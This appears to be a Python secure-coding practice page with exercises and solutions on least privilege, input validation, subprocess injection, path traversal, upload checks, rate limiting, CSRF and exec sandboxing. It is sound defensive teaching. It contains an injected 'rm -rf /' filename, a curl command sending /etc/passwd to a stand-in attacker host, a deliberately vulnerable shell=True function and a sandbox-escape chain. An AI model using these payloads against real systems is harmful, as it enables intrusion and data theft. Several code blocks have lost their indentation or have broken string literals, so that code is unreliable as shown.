Skip to main content

Python Secure Coding Patterns Practice Problems & Exercises

Practice: Secure Coding Patterns

11 problems4 Easy4 Medium3 Hard50–65 min
← Back to lesson

Easy

#1Principle of Least Privilege — Function PermissionsEasy
least-privilegepermissionsaccess-control

Demonstrate the principle of least privilege by showing that a read-only processor cannot write or delete files.

Solution
class FileProcessor:
def __init__(self, read_only: bool = True) -> None:
self.read_only = read_only
self._log: list[str] = []

def read_file(self, path: str) -> str:
self._log.append(f"READ {path}")
return f"<contents of {path}>"

def write_file(self, path: str, content: str) -> None:
if self.read_only:
raise PermissionError(f"Processor is read-only — cannot write to {path}")
self._log.append(f"WRITE {path}")

def delete_file(self, path: str) -> None:
if self.read_only:
raise PermissionError(f"Processor is read-only — cannot delete {path}")
self._log.append(f"DELETE {path}")

def audit_log(self) -> list[str]:
return list(self._log)

report_gen = FileProcessor(read_only=True)
content = report_gen.read_file('/data/report.csv')
print(f"read ok: {content[:20]}")

try:
report_gen.write_file('/data/report.csv', 'new content')
except PermissionError:
print(f"write blocked: True")

archiver = FileProcessor(read_only=False)
archiver.write_file('/archive/report.csv', 'archived content')
print(f"write ok: {archiver.audit_log()[-1]}")

Why least privilege matters: If the report generator is compromised (e.g., via a malicious CSV it reads), an attacker gains read-only access — not the ability to overwrite files or delete evidence. This blast radius limitation is the core value of least privilege. Apply it at every layer: DB users (SELECT-only roles), IAM roles (read-only S3 policies), API tokens (scoped to the minimum required endpoints).

# Demonstrate the principle of least privilege:
# A function should request only the permissions it actually needs.

class FileProcessor:
  """
  Simulates a file processor with different permission levels.
  read_only=True means the processor cannot write or delete.
  """

  def __init__(self, read_only: bool = True) -> None:
      self.read_only = read_only
      self._log: list[str] = []

  def read_file(self, path: str) -> str:
      self._log.append(f"READ {path}")
      return f"<contents of {path}>"

  def write_file(self, path: str, content: str) -> None:
      if self.read_only:
          raise PermissionError(f"Processor is read-only — cannot write to {path}")
      self._log.append(f"WRITE {path}")

  def delete_file(self, path: str) -> None:
      if self.read_only:
          raise PermissionError(f"Processor is read-only — cannot delete {path}")
      self._log.append(f"DELETE {path}")

  def audit_log(self) -> list[str]:
      return list(self._log)

# A report generator only needs to read — give it read-only access
report_gen = FileProcessor(read_only=True)
content = report_gen.read_file('/data/report.csv')
print(f"read ok: {content[:20]}")

try:
  report_gen.write_file('/data/report.csv', 'new content')
except PermissionError as e:
  print(f"write blocked: True")

# An archiver needs write access — give it full access
archiver = FileProcessor(read_only=False)
archiver.write_file('/archive/report.csv', 'archived content')
print(f"write ok: {archiver.audit_log()[-1]}")
Expected Output
read ok: <contents of /data/r
write blocked: True
write ok: WRITE /archive/report.csv
Hints

Hint 1: read_only flag gates write and delete — raise PermissionError immediately if the flag is set.

Hint 2: The report generator never needs write access — pass read_only=True explicitly.

Hint 3: Least privilege means the caller grants minimal permissions at construction, not relying on callers to "not call" risky methods.


#2Fail-Safe Defaults — Deny by DefaultEasy
fail-safedeny-by-defaultaccess-controlpermissions

Implement a permission check function that denies by default — access is granted only when explicitly listed.

Solution
PERMISSIONS: dict[str, set[str]] = {
'alice': {'read', 'write'},
'bob': {'read'},
}

def can_access(user: str, action: str, permissions: dict[str, set[str]]) -> bool:
# Fail-safe default: deny if user or action not explicitly granted
user_permissions = permissions.get(user)
if user_permissions is None:
return False
return action in user_permissions

print(f"alice read: {can_access('alice', 'read', PERMISSIONS)}")
print(f"alice write: {can_access('alice', 'write', PERMISSIONS)}")
print(f"bob write: {can_access('bob', 'write', PERMISSIONS)}")
print(f"unknown read: {can_access('charlie', 'read', PERMISSIONS)}")
print(f"alice delete: {can_access('alice', 'delete', PERMISSIONS)}")

Fail-safe vs fail-open: A fail-open system grants access when it cannot make a decision (e.g., returns True on error). A fail-safe system denies. Fail-safe is almost always correct for security gates. The classic failure mode: a developer adds except Exception: return True to avoid breaking the auth flow — now every bug in the auth system grants full access. Deny on uncertainty.

from typing import Optional

PERMISSIONS: dict[str, set[str]] = {
  'alice': {'read', 'write'},
  'bob':   {'read'},
}

def can_access(user: str, action: str, permissions: dict[str, set[str]]) -> bool:
  """
  Return True only if the user is explicitly granted the action.
  Default: DENY (fail-safe).
  """
  pass

# Known user, granted action
print(f"alice read: {can_access('alice', 'read', PERMISSIONS)}")
print(f"alice write: {can_access('alice', 'write', PERMISSIONS)}")

# Known user, NOT granted action
print(f"bob write: {can_access('bob', 'write', PERMISSIONS)}")

# Unknown user — must default to deny
print(f"unknown read: {can_access('charlie', 'read', PERMISSIONS)}")

# Unknown action — must default to deny
print(f"alice delete: {can_access('alice', 'delete', PERMISSIONS)}")
Expected Output
alice read: True
alice write: True
bob write: False
unknown read: False
alice delete: False
Hints

Hint 1: Check if the user exists in permissions first — if not, return False immediately.

Hint 2: Then check if the action is in the user's set — if not, return False.

Hint 3: There should be no code path that returns True by default.


#3Defense in Depth — Layered ValidationEasy
defense-in-depthlayered-securityvalidation

Chain four independent validation layers to demonstrate defense in depth for username validation.

Solution
import re

def layer1_type_check(value: object) -> bool:
return isinstance(value, str)

def layer2_length_check(value: str, max_len: int = 100) -> bool:
return 0 < len(value) <= max_len

def layer3_charset_check(value: str) -> bool:
return bool(re.fullmatch(r'[a-zA-Z0-9_-]+', value))

def layer4_reserved_check(value: str) -> bool:
reserved = {'admin', 'root', 'system', 'null', 'undefined'}
return value.lower() not in reserved

def validate_username(value: object) -> tuple[bool, str]:
if not layer1_type_check(value):
return False, 'type check failed'
# After type check we know value is str
assert isinstance(value, str)
if not layer2_length_check(value):
return False, 'length check failed'
if not layer3_charset_check(value):
return False, 'charset check failed'
if not layer4_reserved_check(value):
return False, 'reserved word'
return True, 'ok'

tests = [
('alice', True, 'valid username'),
(12345, False, 'not a string'),
('', False, 'empty string'),
('a' * 101, False, 'too long'),
('alice<script>',False, 'bad chars'),
('admin', False, 'reserved word'),
('valid-user_1', True, 'valid with special chars'),
]

for value, expected, label in tests:
valid, reason = validate_username(value)
status = 'PASS' if valid == expected else 'FAIL'
print(f"{status}: {label} => {reason}")

Why independent layers: Each layer catches a different attack class. Charset check alone cannot catch reserved words; reserved word check alone cannot catch SQL-special characters. Defense in depth means no single fix must be perfect — the combination is robust. This is the same reasoning behind WAF + input validation + parameterized queries + ORM all coexisting.

# Defense in depth: apply multiple independent validation layers.
# If one layer fails or is bypassed, the others still catch the attack.

def layer1_type_check(value: object) -> bool:
  """Layer 1: Must be a string."""
  return isinstance(value, str)

def layer2_length_check(value: str, max_len: int = 100) -> bool:
  """Layer 2: Must be within length bounds."""
  return 0 < len(value) <= max_len

def layer3_charset_check(value: str) -> bool:
  """Layer 3: Must contain only alphanumeric + hyphen + underscore."""
  import re
  return bool(re.fullmatch(r'[a-zA-Z0-9_-]+', value))

def layer4_reserved_check(value: str) -> bool:
  """Layer 4: Must not be a reserved word."""
  reserved = {'admin', 'root', 'system', 'null', 'undefined'}
  return value.lower() not in reserved

def validate_username(value: object) -> tuple[bool, str]:
  """Run all layers; return (is_valid, reason)."""
  pass

tests = [
  ('alice',        True,  'valid username'),
  (12345,          False, 'not a string'),
  ('',             False, 'empty string'),
  ('a' * 101,      False, 'too long'),
  ('alice<script>',False, 'bad chars'),
  ('admin',        False, 'reserved word'),
  ('valid-user_1', True,  'valid with special chars'),
]

for value, expected, label in tests:
  valid, reason = validate_username(value)
  status = 'PASS' if valid == expected else 'FAIL'
  print(f"{status}: {label} => {reason}")
Expected Output
PASS: valid username => ok
PASS: not a string => type check failed
PASS: empty string => length check failed
PASS: too long => length check failed
PASS: bad chars => charset check failed
PASS: reserved word => reserved word
PASS: valid with special chars => ok
Hints

Hint 1: Call each layer function in order — return the failure reason on first failed layer.

Hint 2: Only return (True, "ok") if all four layers pass.

Hint 3: Each layer is independent: even if an attacker bypasses charset check, reserved word check still runs.


#4Input Length Limits — Prevent Oversized PayloadsEasy
input-validationlength-limitdos-prevention

Implement a length limit enforcer that validates string fields against defined maximums and returns structured errors.

Solution
from typing import Any

MAX_LIMITS = {
'username': 64,
'email': 254,
'bio': 1000,
'password': 128,
}

def enforce_length_limits(data: dict[str, Any], limits: dict[str, int]) -> dict[str, list[str]]:
errors: dict[str, list[str]] = {}
for field, max_len in limits.items():
value = data.get(field)
if value is None or not isinstance(value, str):
continue
if len(value) > max_len:
errors.setdefault(field, []).append(
f"{field} exceeds maximum length of {max_len} (got {len(value)})"
)
return errors

payload = {
'username': 'a' * 65,
'email': '[email protected]',
'bio': 'x' * 1001,
'password': 'correct',
'extra_field': 'ignored',
}

errors = enforce_length_limits(payload, MAX_LIMITS)
for field, msgs in sorted(errors.items()):
print(f"{field}: {msgs[0]}")

Why length limits matter for security: Unbounded input enables ReDoS (catastrophic backtracking in regexes), stack overflows in recursive parsers, and resource exhaustion DoS. A 10 MB username string fed to a bcrypt hasher can pin a CPU for minutes — bcrypt's cost scales with input length. Always enforce limits before doing any expensive processing (hashing, parsing, serialisation) on user-supplied data.

from typing import Any

MAX_LIMITS = {
  'username':   64,
  'email':     254,   # RFC 5321 max
  'bio':      1000,
  'password':  128,
}

def enforce_length_limits(data: dict[str, Any], limits: dict[str, int]) -> dict[str, list[str]]:
  """
  Validate string fields in data against limits.
  Return a dict mapping field name -> list of error messages.
  Only include fields that have errors.
  """
  pass

payload = {
  'username': 'a' * 65,         # 1 over limit
  'email': '[email protected]',  # fine
  'bio': 'x' * 1001,            # 1 over limit
  'password': 'correct',        # fine
  'extra_field': 'ignored',     # no limit defined — skip
}

errors = enforce_length_limits(payload, MAX_LIMITS)
for field, msgs in sorted(errors.items()):
  print(f"{field}: {msgs[0]}")
Expected Output
bio: bio exceeds maximum length of 1000 (got 1001)
username: username exceeds maximum length of 64 (got 65)
Hints

Hint 1: Only validate fields that appear in both data and limits — skip unknown fields.

Hint 2: Skip non-string values silently (or add a type error — your choice).

Hint 3: Build the errors dict by checking len(value) > limit for each applicable field.


Medium

#5Safe Subprocess with shlex and List ArgsMedium
subprocessshlexcommand-injectionsafe-exec

Demonstrate command injection in shell=True mode and implement a safe alternative using list-based subprocess arguments with input validation.

Solution
import subprocess
import re
from typing import Optional

def unsafe_run(user_filename: str) -> str:
cmd = f"wc -l {user_filename}"
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
return result.stdout.strip()

def safe_run(user_filename: str) -> tuple[str, int]:
if not re.fullmatch(r'[a-zA-Z0-9_./-]+', user_filename):
raise ValueError(f"Unsafe filename: {user_filename!r}")
result = subprocess.run(
['wc', '-l', user_filename],
capture_output=True,
text=True,
)
return result.stdout.strip(), result.returncode

try:
safe_run('report.txt; rm -rf /')
except ValueError:
print(f"injection blocked: True")

output, code = safe_run('/etc/hosts')
print(f"safe run returncode: {code}")
print(f"output is string: {isinstance(output, str)}")

The shell=True trap: subprocess.run("wc -l " + filename, shell=True) passes the full string to /bin/sh -c. If filename is "report.txt; curl attacker.com -d $(cat /etc/passwd)", the shell executes both commands. With a list arg like ['wc', '-l', filename], the OS passes filename verbatim as an argument to wc — no shell parsing, no injection. shlex.split() is useful for parsing a trusted config string, not for making untrusted input safe.

import subprocess
import shlex
from typing import Optional

def unsafe_run(user_filename: str) -> str:
  """VULNERABLE: shell=True with string interpolation."""
  # DO NOT use in production — demonstrates command injection
  cmd = f"wc -l {user_filename}"
  result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
  return result.stdout.strip()

def safe_run(user_filename: str) -> tuple[str, int]:
  """
  SAFE: Use a list of args (no shell=True).
  Validate that the filename contains only safe characters before running.
  Returns (stdout, returncode).
  Raise ValueError if filename contains dangerous characters.
  """
  import re
  # Only allow: letters, digits, dash, underscore, dot, forward slash
  if not re.fullmatch(r'[a-zA-Z0-9_./-]+', user_filename):
      raise ValueError(f"Unsafe filename: {user_filename!r}")
  result = subprocess.run(
      ['wc', '-l', user_filename],
      capture_output=True,
      text=True,
  )
  return result.stdout.strip(), result.returncode

# Test safe validation
try:
  safe_run('report.txt; rm -rf /')
except ValueError as e:
  print(f"injection blocked: True")

# Test with a valid-looking path (will fail because file doesn't exist, but that's OK)
output, code = safe_run('/etc/hosts')
print(f"safe run returncode: {code}")
print(f"output is string: {isinstance(output, str)}")
Expected Output
injection blocked: True
safe run returncode: 0
output is string: True
Hints

Hint 1: The key safety is passing args as a list to subprocess.run — the OS does NOT invoke a shell.

Hint 2: shell=True passes the string to /bin/sh — semicolons, pipes, and backticks all work as shell operators.

Hint 3: Whitelist the filename with re.fullmatch before even building the arg list.


#6Path Traversal PreventionMedium
path-traversaldirectory-traversalfile-accesssecurity

Implement a path traversal-safe file reader that rejects any path resolving outside the upload directory.

Solution
import os
from pathlib import Path
import tempfile

def safe_read_file(user_provided_path: str, base_dir: Path) -> str:
# Resolve collapses all .. and symlinks
resolved = (base_dir / user_provided_path).resolve()
base_resolved = base_dir.resolve()

# Python 3.9+ alternative: resolved.is_relative_to(base_resolved)
if not str(resolved).startswith(str(base_resolved) + os.sep) and resolved != base_resolved:
raise PermissionError(f"Path traversal detected: {user_provided_path!r}")
if not resolved.exists():
raise FileNotFoundError(f"File not found: {resolved}")
return resolved.read_text()

with tempfile.TemporaryDirectory() as tmpdir:
base = Path(tmpdir) / 'uploads'
base.mkdir()
(base / 'report.csv').write_text('id,name\n1,alice')

content = safe_read_file('report.csv', base)
print(f"valid read: {content[:8]}")

try:
safe_read_file('../../etc/passwd', base)
except PermissionError:
print(f"traversal blocked: True")

try:
safe_read_file('../uploads/../../../etc/hosts', base)
except PermissionError:
print(f"encoded traversal blocked: True")

Why .resolve() is the fix: String-based checks like if '..' in path are trivially bypassable with URL encoding (%2e%2e), unicode variants, or extra slashes. Path.resolve() calls the OS path normalisation — it follows the same rules the filesystem uses. After resolving, a simple prefix check is reliable. Never do path security with string manipulation alone.

import os
from pathlib import Path

BASE_DIR = Path('/var/app/uploads')

def safe_read_file(user_provided_path: str) -> str:
  """
  Safely read a file within BASE_DIR.
  Prevent path traversal (../../etc/passwd style attacks).
  Raise PermissionError if the resolved path escapes BASE_DIR.
  Raise FileNotFoundError if the file does not exist within BASE_DIR.
  """
  pass

# Simulate the filesystem for testing
import tempfile, pathlib

with tempfile.TemporaryDirectory() as tmpdir:
  base = Path(tmpdir) / 'uploads'
  base.mkdir()
  (base / 'report.csv').write_text('id,name
1,alice')

  # Monkey-patch BASE_DIR for testing
  import builtins
  _orig_base = BASE_DIR

  def safe_read_file_test(user_path: str, base_dir: Path) -> str:
      resolved = (base_dir / user_path).resolve()
      if not str(resolved).startswith(str(base_dir.resolve())):
          raise PermissionError(f"Path traversal detected: {user_path!r}")
      if not resolved.exists():
          raise FileNotFoundError(f"File not found: {resolved}")
      return resolved.read_text()

  # Valid access
  content = safe_read_file_test('report.csv', base)
  print(f"valid read: {content[:8]}")

  # Traversal attempt
  try:
      safe_read_file_test('../../etc/passwd', base)
  except PermissionError:
      print(f"traversal blocked: True")

  # Hidden traversal with encoded dots
  try:
      safe_read_file_test('../uploads/../../../etc/hosts', base)
  except PermissionError:
      print(f"encoded traversal blocked: True")
Expected Output
valid read: id,name
traversal blocked: True
encoded traversal blocked: True
Hints

Hint 1: Use Path.resolve() on the joined path — this collapses all .. components and symlinks.

Hint 2: Then check if the resolved path starts with BASE_DIR.resolve() as a string (or use .is_relative_to() in Python 3.9+).

Hint 3: Always resolve BASE_DIR too — if BASE_DIR itself contains symlinks, the check can be bypassed.


#7Safe File Upload ValidationMedium
file-uploadmime-typevalidationsecurity

Implement a file upload validator that checks extension, declared MIME type, magic bytes, and file size.

Solution
import os
from dataclasses import dataclass

@dataclass
class UploadedFile:
filename: str
content_type: str
size_bytes: int
content: bytes

ALLOWED_TYPES = {
'image/jpeg': [b'\xff\xd8\xff'],
'image/png': [b'\x89PNG\r\n'],
'application/pdf': [b'%PDF'],
}
MAX_SIZE = 5 * 1024 * 1024

EXTENSION_MAP = {
'.jpg': 'image/jpeg',
'.jpeg': 'image/jpeg',
'.png': 'image/png',
'.pdf': 'application/pdf',
}

def validate_upload(file: UploadedFile) -> tuple[bool, str]:
# 1. Extension check
ext = os.path.splitext(file.filename)[1].lower()
if ext not in EXTENSION_MAP:
return False, 'file extension not allowed'

# 2. Declared content_type must be allowed
if file.content_type not in ALLOWED_TYPES:
return False, 'content type not allowed'

# 3. Extension must match content_type
if EXTENSION_MAP[ext] != file.content_type:
return False, 'extension does not match declared content type'

# 4. Magic bytes must match
magic_signatures = ALLOWED_TYPES[file.content_type]
if not any(file.content.startswith(sig) for sig in magic_signatures):
return False, 'magic bytes do not match declared content type'

# 5. Size check
if file.size_bytes > MAX_SIZE:
return False, f'file exceeds maximum size of {MAX_SIZE} bytes'

return True, 'ok'

jpeg = UploadedFile('photo.jpg', 'image/jpeg', 1024, b'\xff\xd8\xff' + b'fake jpeg data')
valid, reason = validate_upload(jpeg)
print(f"jpeg valid: {valid}{reason}")

mismatch = UploadedFile('malware.exe', 'image/jpeg', 100, b'\xff\xd8\xff' + b'data')
valid, reason = validate_upload(mismatch)
print(f"exe blocked: {not valid}{reason}")

fake_png = UploadedFile('image.png', 'image/png', 100, b'\xff\xd8\xff' + b'data')
valid, reason = validate_upload(fake_png)
print(f"fake png blocked: {not valid}{reason}")

big = UploadedFile('big.jpg', 'image/jpeg', MAX_SIZE + 1, b'\xff\xd8\xff' + b'data')
valid, reason = validate_upload(big)
print(f"oversized blocked: {not valid}{reason}")

Why magic bytes matter: An attacker can rename exploit.php to photo.jpg. Checking only the extension or the HTTP Content-Type header is trivially bypassed — both are attacker-controlled. Magic bytes are the first N bytes of the actual file content, defined by the file format spec. They are harder to fake because the file must actually begin with those bytes. Use python-magic (libmagic binding) in production for robust detection beyond first-bytes heuristics.

import os
from dataclasses import dataclass
from typing import Optional

@dataclass
class UploadedFile:
  filename: str
  content_type: str   # MIME type from HTTP header (untrusted)
  size_bytes: int
  content: bytes      # first few bytes for magic number check

ALLOWED_TYPES = {
  'image/jpeg': [b'ÿØÿ'],
  'image/png':  [b'‰PNG
'],
  'application/pdf': [b'%PDF'],
}
MAX_SIZE = 5 * 1024 * 1024  # 5 MB

def validate_upload(file: UploadedFile) -> tuple[bool, str]:
  """
  Validate an uploaded file:
  1. Extension must match allowed MIME types
  2. Declared content_type must be in ALLOWED_TYPES
  3. Magic bytes must match the declared content_type
  4. Size must be within MAX_SIZE
  Returns (is_valid, reason).
  """
  pass

# Valid JPEG (fake magic bytes for test)
jpeg = UploadedFile('photo.jpg', 'image/jpeg', 1024, b'ÿØÿ' + b'fake jpeg data')
valid, reason = validate_upload(jpeg)
print(f"jpeg valid: {valid} — {reason}")

# Extension mismatch
mismatch = UploadedFile('malware.exe', 'image/jpeg', 100, b'ÿØÿ' + b'data')
valid, reason = validate_upload(mismatch)
print(f"exe blocked: {not valid} — {reason}")

# Wrong magic bytes (claims to be PNG but has JPEG magic)
fake_png = UploadedFile('image.png', 'image/png', 100, b'ÿØÿ' + b'data')
valid, reason = validate_upload(fake_png)
print(f"fake png blocked: {not valid} — {reason}")

# Too large
big = UploadedFile('big.jpg', 'image/jpeg', MAX_SIZE + 1, b'ÿØÿ' + b'data')
valid, reason = validate_upload(big)
print(f"oversized blocked: {not valid} — {reason}")
Expected Output
jpeg valid: True — ok
exe blocked: True — file extension not allowed
fake png blocked: True — magic bytes do not match declared content type
oversized blocked: True — file exceeds maximum size of 5242880 bytes
Hints

Hint 1: Extract the extension with os.path.splitext(filename)[1].lower() and check it matches the MIME type.

Hint 2: For magic byte check, use content.startswith(magic) — any of the magic byte sequences for that MIME type.

Hint 3: Check size first (cheap) before doing magic byte inspection (requires reading bytes).


#8Token Bucket Rate LimiterMedium
rate-limitingtoken-bucketdos-preventionthrottling

Implement a token bucket rate limiter that tracks each user key independently.

Solution
import time

class TokenBucketRateLimiter:
def __init__(self, capacity: int, rate: float) -> None:
self._capacity = capacity
self._rate = rate
self._buckets: dict[str, dict] = {}

def allow(self, key: str) -> bool:
now = time.monotonic()
if key not in self._buckets:
self._buckets[key] = {'tokens': self._capacity, 'last': now}

bucket = self._buckets[key]
elapsed = now - bucket['last']
# Refill tokens based on elapsed time
bucket['tokens'] = min(self._capacity, bucket['tokens'] + elapsed * self._rate)
bucket['last'] = now

if bucket['tokens'] >= 1:
bucket['tokens'] -= 1
return True
return False

limiter = TokenBucketRateLimiter(capacity=3, rate=1.0)

results = [limiter.allow('user-1') for _ in range(3)]
print(f"first 3 allowed: {all(results)}")

denied = limiter.allow('user-1')
print(f"4th denied: {not denied}")

allowed_other = limiter.allow('user-2')
print(f"user-2 allowed: {allowed_other}")

time.sleep(1.1)
refilled = limiter.allow('user-1')
print(f"after refill allowed: {refilled}")

Token bucket vs fixed window: Fixed window counters (reset every 60s) allow burst attacks at window boundaries — 100 requests at 11:59:59, 100 more at 12:00:01, 200 total in 2 seconds. Token bucket smooths this: tokens accumulate gradually, so burst capacity is bounded by the bucket size. In production use Redis with Lua scripts for atomic token bucket operations across multiple app servers.

import time
from typing import Optional

class TokenBucketRateLimiter:
  """
  Token bucket algorithm:
  - Bucket holds up to 'capacity' tokens.
  - Tokens refill at 'rate' tokens per second.
  - Each request consumes 1 token.
  - If no tokens available, the request is denied.
  """

  def __init__(self, capacity: int, rate: float) -> None:
      """capacity: max tokens; rate: tokens added per second."""
      pass

  def allow(self, key: str) -> bool:
      """
      Check if a request from 'key' is allowed.
      Each key has its own bucket.
      Returns True if allowed, False if rate-limited.
      """
      pass

limiter = TokenBucketRateLimiter(capacity=3, rate=1.0)  # 3 tokens, refill 1/sec

# Use all 3 tokens
results = [limiter.allow('user-1') for _ in range(3)]
print(f"first 3 allowed: {all(results)}")

# 4th request should be denied
denied = limiter.allow('user-1')
print(f"4th denied: {not denied}")

# Different key has its own bucket
allowed_other = limiter.allow('user-2')
print(f"user-2 allowed: {allowed_other}")

# Wait for refill and try again
time.sleep(1.1)
refilled = limiter.allow('user-1')
print(f"after refill allowed: {refilled}")
Expected Output
first 3 allowed: True
4th denied: True
user-2 allowed: True
after refill allowed: True
Hints

Hint 1: Store per-key state as (tokens, last_refill_time) in a dict.

Hint 2: On each allow() call, compute elapsed = now - last_refill and add elapsed * rate tokens (capped at capacity).

Hint 3: If tokens >= 1, deduct 1 and return True; else return False.


Hard

#9Security Middleware ChainHard
middlewaresecurity-headerscsrfrate-limitingchain

Implement a CSRF middleware and compose it with security headers and rate limiting into a complete security middleware chain.

Solution
from dataclasses import dataclass, field
from typing import Callable
import time

@dataclass
class Request:
method: str
path: str
headers: dict[str, str]
body: str = ''
client_ip: str = '127.0.0.1'

@dataclass
class Response:
status: int
body: str
headers: dict[str, str] = field(default_factory=dict)

Handler = Callable[[Request], Response]

def security_headers_middleware(next_handler: Handler) -> Handler:
def handler(req: Request) -> Response:
resp = next_handler(req)
resp.headers.update({
'X-Content-Type-Options': 'nosniff',
'X-Frame-Options': 'DENY',
'Strict-Transport-Security': 'max-age=31536000',
})
return resp
return handler

def rate_limit_middleware(next_handler: Handler, capacity: int = 5) -> Handler:
buckets: dict[str, dict] = {}
rate = 2.0

def handler(req: Request) -> Response:
now = time.monotonic()
ip = req.client_ip
if ip not in buckets:
buckets[ip] = {'tokens': float(capacity), 'last': now}
b = buckets[ip]
b['tokens'] = min(capacity, b['tokens'] + (now - b['last']) * rate)
b['last'] = now
if b['tokens'] < 1:
return Response(429, 'Too Many Requests')
b['tokens'] -= 1
return next_handler(req)
return handler

def csrf_middleware(next_handler: Handler, valid_tokens: set[str]) -> Handler:
SAFE_METHODS = {'GET', 'HEAD', 'OPTIONS'}

def handler(req: Request) -> Response:
if req.method.upper() in SAFE_METHODS:
return next_handler(req)
token = req.headers.get('X-CSRF-Token')
if token not in valid_tokens:
return Response(403, 'CSRF token missing or invalid')
return next_handler(req)
return handler

def compose_middleware(handler: Handler, middlewares: list) -> Handler:
for mw in reversed(middlewares):
handler = mw(handler)
return handler

def app(req: Request) -> Response:
return Response(200, f"Hello from {req.path}")

valid_csrf = {'csrf-token-abc123'}

pipeline = compose_middleware(app, [
security_headers_middleware,
rate_limit_middleware,
lambda h: csrf_middleware(h, valid_csrf),
])

resp = pipeline(Request('GET', '/api/data', {}))
print(f"GET status: {resp.status}")
print(f"security header present: {'X-Frame-Options' in resp.headers}")

resp = pipeline(Request('POST', '/api/data', {}, body='name=alice'))
print(f"POST no csrf: {resp.status}")

resp = pipeline(Request('POST', '/api/data', {'X-CSRF-Token': 'csrf-token-abc123'}, body='name=alice'))
print(f"POST with csrf: {resp.status}")

Middleware ordering matters: Security headers go outermost (they wrap every response including 429/403 from inner layers). Rate limiting goes before CSRF check — this prevents DoS via repeated CSRF failures. CSRF goes innermost (closest to the app) — only state-changing routes need it. In FastAPI/Starlette, this is implemented with @app.middleware("http") or Middleware(...) class.

from dataclasses import dataclass, field
from typing import Callable, Optional
import time

@dataclass
class Request:
  method: str
  path: str
  headers: dict[str, str]
  body: str = ''
  client_ip: str = '127.0.0.1'

@dataclass
class Response:
  status: int
  body: str
  headers: dict[str, str] = field(default_factory=dict)

Handler = Callable[[Request], Response]

def security_headers_middleware(next_handler: Handler) -> Handler:
  """Add security headers to every response."""
  def handler(req: Request) -> Response:
      resp = next_handler(req)
      resp.headers.update({
          'X-Content-Type-Options': 'nosniff',
          'X-Frame-Options': 'DENY',
          'Strict-Transport-Security': 'max-age=31536000',
      })
      return resp
  return handler

def rate_limit_middleware(next_handler: Handler, capacity: int = 5) -> Handler:
  """Simple per-IP token bucket (inline for brevity)."""
  buckets: dict[str, dict] = {}
  rate = 2.0  # tokens/sec

  def handler(req: Request) -> Response:
      now = time.monotonic()
      ip = req.client_ip
      if ip not in buckets:
          buckets[ip] = {'tokens': float(capacity), 'last': now}
      b = buckets[ip]
      b['tokens'] = min(capacity, b['tokens'] + (now - b['last']) * rate)
      b['last'] = now
      if b['tokens'] < 1:
          return Response(429, 'Too Many Requests')
      b['tokens'] -= 1
      return next_handler(req)
  return handler

def csrf_middleware(next_handler: Handler, valid_tokens: set[str]) -> Handler:
  """
  For state-changing methods (POST/PUT/DELETE/PATCH),
  require X-CSRF-Token header to be in valid_tokens.
  GET/HEAD/OPTIONS are exempt.
  """
  def handler(req: Request) -> Response:
      pass  # implement this
  return handler

def compose_middleware(handler: Handler, middlewares: list) -> Handler:
  """Apply middlewares in reverse so first in list is outermost."""
  for mw in reversed(middlewares):
      handler = mw(handler)
  return handler

# Core handler
def app(req: Request) -> Response:
  return Response(200, f"Hello from {req.path}")

valid_csrf = {'csrf-token-abc123'}

pipeline = compose_middleware(app, [
  security_headers_middleware,
  rate_limit_middleware,
  lambda h: csrf_middleware(h, valid_csrf),
])

# Valid GET — should pass through
resp = pipeline(Request('GET', '/api/data', {}))
print(f"GET status: {resp.status}")
print(f"security header present: {'X-Frame-Options' in resp.headers}")

# POST without CSRF token
resp = pipeline(Request('POST', '/api/data', {}, body='name=alice'))
print(f"POST no csrf: {resp.status}")

# POST with valid CSRF token
resp = pipeline(Request('POST', '/api/data', {'X-CSRF-Token': 'csrf-token-abc123'}, body='name=alice'))
print(f"POST with csrf: {resp.status}")
Expected Output
GET status: 200
security header present: True
POST no csrf: 403
POST with csrf: 200
Hints

Hint 1: SAFE_METHODS = {"GET", "HEAD", "OPTIONS"} — call next_handler directly for these.

Hint 2: For other methods, check req.headers.get("X-CSRF-Token") against valid_tokens.

Hint 3: Return Response(403, "CSRF token missing or invalid") if the token is absent or not in the set.


#10Sandbox exec with Restricted BuiltinsHard
sandboxexecrestricted-builtinssecurity

Implement a sandboxed exec wrapper that restricts available builtins to a safe subset, blocking file system and import access.

Solution
SAFE_BUILTINS = {
'print': print,
'range': range,
'len': len,
'int': int,
'str': str,
'float': float,
'list': list,
'dict': dict,
'tuple': tuple,
'set': set,
'abs': abs,
'min': min,
'max': max,
'sum': sum,
'enumerate': enumerate,
'zip': zip,
'sorted': sorted,
'reversed': reversed,
'isinstance': isinstance,
'bool': bool,
}

def sandboxed_exec(code: str, user_globals: dict | None = None) -> dict:
safe_globals = {'__builtins__': SAFE_BUILTINS}
if user_globals:
safe_globals.update(user_globals)
local_ns: dict = {}
exec(code, safe_globals, local_ns)
return local_ns

result = sandboxed_exec("x = sum(range(10))\nprint(x)")
print(f"safe code result: {result.get('x')}")

try:
sandboxed_exec("f = open('/etc/passwd')")
print("open not blocked!")
except Exception:
print(f"open blocked: True")

try:
sandboxed_exec("os = __import__('os')")
print("import not blocked!")
except Exception:
print(f"import blocked: True")

Why this is not production-safe: Python objects carry references to their class and to builtins. A resourceful attacker can walk the object graph: ().__class__.__bases__[0].__subclasses__() lists all loaded classes, and somewhere in that list is subprocess.Popen. Real isolation requires OS-level sandboxing: seccomp filters (Docker, gVisor), separate process with setrlimit, or a purpose-built evaluator like RestrictedPython. Use this pattern only for trusted-ish user scripts with a known threat model.

# WARNING: Python sandboxing via restricted __builtins__ is NOT production-safe.
# A determined attacker can escape it. Use subprocess isolation or gVisor for real sandboxing.
# This exercise teaches the CONCEPT and common bypass vectors.

SAFE_BUILTINS = {
  'print': print,
  'range': range,
  'len': len,
  'int': int,
  'str': str,
  'float': float,
  'list': list,
  'dict': dict,
  'tuple': tuple,
  'set': set,
  'abs': abs,
  'min': min,
  'max': max,
  'sum': sum,
  'enumerate': enumerate,
  'zip': zip,
  'sorted': sorted,
  'reversed': reversed,
  'isinstance': isinstance,
  'bool': bool,
}

def sandboxed_exec(code: str, user_globals: dict | None = None) -> dict:
  """
  Execute code with restricted builtins.
  Return the local namespace after execution.
  Raise RuntimeError if the code attempts to use a forbidden builtin.
  """
  safe_globals = {'__builtins__': SAFE_BUILTINS}
  if user_globals:
      safe_globals.update(user_globals)
  local_ns: dict = {}
  exec(code, safe_globals, local_ns)
  return local_ns

# Safe code should work
result = sandboxed_exec("x = sum(range(10))
print(x)")
print(f"safe code result: {result.get('x')}")

